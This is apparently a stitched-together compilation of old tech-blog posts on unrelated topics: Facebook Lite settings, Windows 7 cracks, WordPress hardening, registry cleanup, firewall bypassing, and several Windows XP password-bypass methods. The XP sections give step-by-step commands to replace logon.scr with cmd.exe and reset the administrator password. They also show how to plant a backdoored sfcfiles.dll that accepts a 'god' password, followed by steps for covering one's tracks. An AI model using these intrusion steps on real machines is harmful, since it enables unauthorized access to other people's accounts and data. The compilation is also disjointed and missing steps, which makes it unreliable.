Official way to Switch off Facebook Lite

On the top right hand corner before the search box you’ll see two small icons, the first on looks like a spanner click this, this will take you to the facebook lite settings page.

Select. When I go to Facebook.com, show me, Regular Facebook. and click save you should be done. You also have the option of checking Let me switch between regular Facebook and Facebook Lite If you select this option, a blue bar will appear at the top of Facebook that enables you to switch back and forth between the two versions i.e Facebook Lite and the default Facebook Interface.

Use The Facebook Feeback Form

Scroll way down to the bottom of the facebook lite interface at the bottom you’ll see a small link called feedback click this., You’ll see a new page at the top it will say Looking to get back to the regular Facebook? Just click here. Just click the given link it should turn off the Facebook Lite interface and send you back to the regular Facebook interface.

Other Methods are listed below but not Guaranteed to work.

Change Facebook URL Link

You’ll notice that the Url has changed to http://lite.facebook.com/ just change this back to http://facebook.com/. This doesn’t work all the time you can try to use http://lite.facebook.com/home.php

Clear Your browser Cookies and Cache

Clear your browser cookies and cache and try logging into facebook again, the facebook lite interface should be gone now.
For Internet Explorer users go to your menu bar and click Tools –> Internet Options –> Delete Cookies and Delete Files
For Firefox Users go to your menu bar and click Tools –> Clear recent History –> Select all the options and click Clear all

Windows 7 Activation Key Cracks Using Chew WGA & RemoveWGA

The cracks currently floating around the internet are called Chew WGA and RemoveWGA. They provide one click patch solution for Windows 7 RTM. The cracks do not actually validate or activate windows, but lets you use Windows 7 indefinitely. Microsoft has confirmed that they are aware of these cracks for Windows 7 and are working swiftly to fix this. Knowing Microsoft this shouldn’t take too long. The Security fix from Microsoft will most likely be a Windows 7 Update patch. People who use pirated and cracked software, will mostly likely be unable to update Windows 7 without deactivating the crack.

People who use pirated and cracked software are mostly likely to be open to malware and virus attacks, personally I recommend buying the original software, If you can’t afford it Ubuntu Linux is a great option its Free and Open Source, and in some ways is better than windows in terms of security.

1. Drop the WordPress Meta Tag

By default a large number of WordPress themes have the WordPress Meta Tag which show the version of WordPress that is currently running on the blog. I have even removed the Powered by WordPress links from the footer this has reduced spam by a certain degree.

2. Disable Access to your Directory Indexes.

If you are not aware by default if some types in the path to your Plugins Directory they can view a list of all files in the directory. The best way to disable this is through the HTACCESS file. add the line given at the bottom of your Htaccess file in the root of your blog.

The other way to disable it as outlined by matt cutts is to put a blank index.php or index.html file in the Plugins directory.

3. Disable access to /wp-admin/

This is the most drastic measure you can take. i.e. to block access to the wp-admin directory using htaccess. But this will work only if you browse the net with a Static IP address. Also this is not necessary if you are using the latest version of WordPress.

Main purpose of the project: to demonstrate the real state of security in search engines. There are vulnerabilities in the engines (that mean that their developers insufficiently attend to security) and the community need to know about that. When he will be knowing truth, every user of Internet will can make thoughtful choice concerning search engines.

In the project took part 33 search engines (30 web engines and 3 local engines) of 19 vendors, some vendors have several engines. The list of project’s participants (in order of appearance): Meta, Yahoo, HotBot, Gigablast, MSN, Clusty, Yandex, Yandex.Server (local engine), Search Europe, Rambler, Ask.com, Ezilon, AltaVista, AltaVista local (local engine), MetaCrawler, Mamma, Google, Google Custom Search Engine (local engine), My Way, Lycos, Aport, Netscape Search, WebCrawler, Dogpile, AOL Search, My Search, My Web Search, LookSmart, DMOZ (Open Directory Project), InfoSpace, Euroseek, Kelkoo, Excite.

Altogether there were published 104 vulnerabilities in mentioned engines. Including Cross-Site Scripting (as XSS, and as HTML Injection), Full path disclosure, Content Spoofing and Information disclosure vulnerabilities. It is without taking into account redirectors in search engines (altogether there were published 23 redirectors).

Results of the projects: fixed 44 vulnerabilities from 104 (without taking into account redirectors). It is 42,31% fixed vulnerabilities. Owners of search engines have a place for improvements of their engines’ security.

Out of all these Search Engines Google was the one that didn’t fix any of the holes.

The Currently installed programs list in the Add or Remove Programs tool lists all of the Windows-compatible programs that have an uninstall program or feature. Occasionally, a program may not be removed completely, and the registry key that is used to display the program in the Currently installed programs list remains. In this situation, you may need to manually remove the program from the Currently installed programs list in Add or Remove Programs. To do this, follow these steps.

WARNING: If you use Registry Editor incorrectly, you may cause serious problems that may require you to reinstall your operating system. Microsoft cannot guarantee that you can solve problems that result from using Registry Editor incorrectly. Use Registry Editor at your own risk.
1. Click Start, and then click Run.
2. In the Open box, type regedt32, and then click OK.
3. In Registry Editor, locate the following registry key:

KEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall

. In the left pane, click the Uninstall registry key, and then click Export on the File menu.
5. In the Export Registry File dialog box that appears, click Desktop in the Save in list, type uninstall in the File name box, and then click Save.
6. Each key listed under Uninstall in the left pane of Registry Editor represents a program that is displayed in the Currently installed programs list of the Add or Remove Programs tool. To determine which program that each key represents, click the key, and then view the following values in the details pane on the right:
DisplayName: The value data for the DisplayName key is the name that is listed in Add or Remove Programs.

UninstallString: The value data for the UninstallString key is the program that is used to uninstall the program.

7. After you identify the registry key that represents the program that you removed but which is still displayed in the Currently installed programs list of Add or Remove Programs, right-click the key in the left pane of the Registry Editor window, and then click Delete.

Click Yes in response to the “Are you sure you want to delete this key and all of its subkeys?” message.
8. On the File menu, click Exit to quit Registry Editor.
9. Click Start, click Control Panel, and then click Add or Remove Programs.
In the Currently installed programs list, verify that the program whose registry key you deleted is no longer listed.
10. Do one of the following:

If the program list is not correct in Add or Remove Programs, double-click the Uninstall.reg file that you saved to your desktop in step 5 to restore the original list of programs in the registry.
-or-
If the program list is correct in Add or Remove Programs, right-click the Uninstall.reg file on your desktop, and then click Delete.

You could also use the following free tool HideAddRemoveItems.exe Just remember that you’l need admin rights to do any of this.

The First method makes use of DreampackPL

DreamPackPL give access to system without reset/overwrite old passwords, therefore EFS encrypted file(s) will be still readable. It can help if You forgot the password or user name.
With this tool You can do:
- execute any program at the logon desktop with system privileges,
- load Explorer shell into new desktop and work as impersonate user with system privelges,
- display local accounts list (user names) in logon desktop,
- turn off/on logon password check (full access to every local account).

All You must do is: boot from CD, copy one file into system32 directory (in Recovery Console) and restart computer. Boot CD You can simply create in other 2000/XP system. You put Windows installation CD (2000 or XP) into CD-ROM drive and DreamPack will create ISO CD image, that You can then burn with any program.

This tool was tested up to now only on Windows in polish version.

The next technique makes use of a loophole in the Windows XP repair process you’ll need a bootable XP CD

1. Place your Windows XP CD in your CD-ROM and start your computer (You need your XP CD is bootable as it should be – and that you have your bios set to boot from CD)
2. Keep your eye on the screen messages for booting to your cd Typically, it will be Press any key to boot from cd
3. Once you get in, the first screen will indicate that Setup is inspecting your system and loading files.
4. When you get to the Welcome to Setup screen, press ENTER to Setup Windows now
5. The Licensing Agreement comes next – Press F8 to accept it.
6. The next screen is the Setup screen which gives you the option to do a Repair.
7. It should read something like If one of the following Windows XP installations is damaged, Setup can try to repair it
   Use the up and down arrow keys to select your XP installation (if you only have one, it should already be selected) and press R to begin the Repair process.
8. Let the Repair run. Setup will now check your disks and then start copying files which can take several minutes.
9. Shortly after the Copying Files stage, you will be required to reboot. (this will happen automatically you will see a progress bar stating Your computer will reboot in 15 seconds
10. During the reboot, do not make the mistake of pressing any key to boot from the CD again! Setup will resume automatically with the standard billboard screens and you will notice Installing Windows is highlighted.
11. Keep your eye on the lower left hand side of the screen and when you see the Installing Devices progress bar, press SHIFT + F10. This is the security hole! A command console will now open up giving you the potential for wide access to your system.
12. At the prompt, type NUSRMGR.CPL and press Enter. Voila! You have just gained graphical access to your User Accounts in the Control Panel.
13. Now simply pick the account you need to change and remove or change your password as you prefer. If you want to log on without having to enter your new password, you can type control userpasswords2 at the prompt and choose to log on without being asked for password. After you ve made your changes close the windows, exit the command box and continue on with the Repair (have your Product key handy).
14. Once the Repair is done, you will be able to log on with your new password (or without a password if you chose not to use one or if you chose not to be asked for a password). Your programs and personalized settings should remain intact.
15. I tested the above on Windows XP Pro with and without SP1 and also used this method in a real situation where someone could not remember their password and it worked like a charm to fix the problem.
16. And in case you are wondering, NO, you cannot cancel install after making the changes and expect to logon with your new password. Cancelling will just result in Setup resuming at bootup and your changes will be lost.

Windows XP Privilege Escalation Exploit

(Before you continue Read the Updates at the bottom)

Here are the steps involved to Hack the Window XP Administrator Password .

1. Go to Start –> Run –> Type in CMD
2. You will get a command prompt. Enter these commands the way it is given
3. cd\
4. cd\ windows\system32
5. mkdir temphack
6. copy logon.scr temphack\logon.scr
7. copy cmd.exe temphack\cmd.exe
8. del logon.scr
9. rename cmd.exe logon.scr
10. exit

Wait its not over read the rest to find out how to Hack the Window XP Administrator Password
A Brief explanation of what you are currently doing here is

Your are nagivating to the windows system Directory where the system files are stored. Next your creating a temporary directory called mkdir. After which you are copying or backing up the logon.scr and cmd.exe files into the mkdir then you are deleting the logon.scr file and renaming cmd.exe file to logon.scr.

So basically you are telling windows is to backup the command program and the screen saver file. Then we edited the settings so when windows loads the screen saver, we will get an unprotected dos prompt without logging in. When this appears enter this command

net user password

Example: If the admin user name is clazh and you want change the password to pass Then type in the following command

net user clazh pass

This will chang the admin password to pass.
Thats it you have sucessfully hacked the Window XP Administrator Password now you can Log in, using the hacked Window XP Administrator Password and do whatever you want to do.

Here are the steps involved to De Hack or restore the Window XP Administrator Password to cover your tracks.

1. Go to Start –> Run –> Type in CMD
2. You will get a command prompt. Enter these commands the way it is given
3. cd\
4. cd\ windows\system32\temphack
5. copy logon.scr C:\windows\system32\logon.scr
6. copy cmd.exe C:\windows\system32\cmd.exe
7. exit

Or simply go to C:\windows\system32\temphack and copy the contents of temphack back into system32 directory click Yes to overwrite the modified files.

Note To administrators: You can block the entire password change thing just a little tweak in the local security policy (control panel->administrative tools,works only for administrators group) will disallow any change in password even if u r the Admin (u can put a number of other restrictions too), but be cautious to give other users limitted accounts. After you have done this, the above Screensaver technique will fail.

Update: Christian Mohn points out The Above method is is possible only if you have Local Administrator Privileges. My fault for not checking it up before posting.

Update: The above Method only works if the system is FAT/FAT32 – because of the updated “user rights management” in NTFS – file level rights etc. This does not work on a system using NTFS.

Hack or Crack a Windows XP Administrator Password using OphCrack

Ophcrack is a Windows password cracker based on rainbow tables. It is a very efficient implementation of rainbow tables done by the inventors of the method. It comes with a GTK+ Graphical User Interface and runs on Windows, Mac OS X (Intel CPU) as well as on Linux.

Go to Ophcrack and download the live CD burn it to a disk and boot with it. It will depend on how strong the password is.

Recover the Password using DreamPackPL

Steps to Hack into a Windows XP Computer without changing password:

1. Get physical access to the machine. Remember that it must have a CD or DVD drive.
2. Download DreamPackPL http://www.d–b.webpark.pl/dreampackpl_en.htm
3. Unzip the downloaded dreampackpl_iso.zip and you’ll get dreampackpl.ISO.
4. Use any burning program that can burn ISO images.
5. After you have the disk, boot from the CD or DVD drive. You will see Windows 2000 Setup and it will load some files.
6. Press “R” to install DreamPackPL.
7. Press “C” to install DreamPackPL by using the recovery console.
8. Select the Windows installation that is currently on the computer (Normally is “1? if you only have one Windows installed)
9. Backup your original sfcfiles.dll by typing: “ren C:\Windows\System32\sfcfiles.dll sfcfiles.lld” (without quotes)
10. Copy the hacked file from CD to system32 folder. Type: “copy D:\i386\pinball.ex_ C:\Windows\System32\sfcfiles.dll” (without quotes and assuming your CD drive is D:)
11. Type “exit”, take out disk and reboot.
12. In the password field, type “dreamon” (without quotes) and DreamPack menu will appear.
13. Click the top graphic on the DreamPack menu and you will get a menu popup.
14. Go to commands and enable the options and enable the god command.
15. Type “god” in the password field to get in Windows.

You can also go to Passwords and select “Logon with wrong password and hash”. This option allows you to login with ANY password.

Note: If you are running any kind of Anti-Virus Tool it will give you a prompt saying that it is a Virus since they have already labelled this tool as a Hack-Tool. A Hack-Tool is NOT a virus. The DreamPackPL helps you bypass the Windows Login screen and it is not destructive.

Recover All Windows Password including Vista with Login Recovery

Login Recovery is a Online service that can help you to recover your Windows Password including Windows Vista.

There are three steps Involved

1. Download the Login Recovery Software extraction program to create a bootable floppy disk to read the password file.
   (click here for a CD version)
2. Insert the disk into the computer you wish to recover passwords from and boot the computer to extract the encrypted passwords to the disk.
3. Put the disk into an Internet enabled computer, and upload the encrypted password file for decryption. (see uploads page)

This is a Paid service but Alternativly they Provide a free service which is available by waiting upto 48 hours (Only One free request every three months so be careful how you use it).

Proxy Servers are Computer servers hosted on internet that allow you to access websites through them indirectly. They act as the middleman. For these instructions, we will use an actual proxy server in Taiwan with the technical specs “address 139.223.199.194″ and “port 8080″. Then proceed as follows: Internet Explorer 6.0

3. In the Address box, type the IP address of the proxy server.
4. In the Port box, type the port number that is used by the proxy server for client connections (by default, 8080).
5. You can click to select the Bypass proxy server for local addresses check box if you do not want the proxy server computer to be used when you connect to a computer on the local network (this may speed up performance).
6. Click OK to close the LAN Settings dialog box.
7. Click OK again to close the Internet Options dialog box.

3. Use IP resolution to access/unblock weak firewalls/filters

Principle behind the breaking This only works for filters that check only for the domain name to be blocked and not the IP address of the domain name we know that the domain name is essentially an alias for the IP address of the website. All we have to do is to replace the domain name by its corresponding IP address. Below is a example using http://myspace.com as a example. Just Google for the Term “WHOIS” it will give you a large list of website that you can use to check the Ip address of a Website. For this example I am using http://whois.domaintools.com Which will show you huge list of information about the website scroll down a bit and it will show you the IP address of Myspace. Just copy paste this IP address in your browser and you should be able to start browsing the blocked site.

4. Using the TOR Network Tor (The Onion Router) to Bypass/Unblock firewall restrictions Only For Advanced users.

This Method is only for the extremely desperate example countries where parts of the internet is Censored example places like China, Iran and other Islamic Countries. Therefore if you are from China or Iran you can use the TOR. But for this you need to download ans installed the TOR Software and also requires you to have high speed internet since accessing websites through TOR is relatively slower.

Originally sponsored by the US Naval Research Laboratory, Tor became an Electronic Frontier Foundation (EFF) project in late 2004. Myspace has become ridiculously easy to hack. I try my best to keep this blog updates with the latest hacks/codes that I find over the internet. These days even amateurs spend their time trying to hack into Myspace.
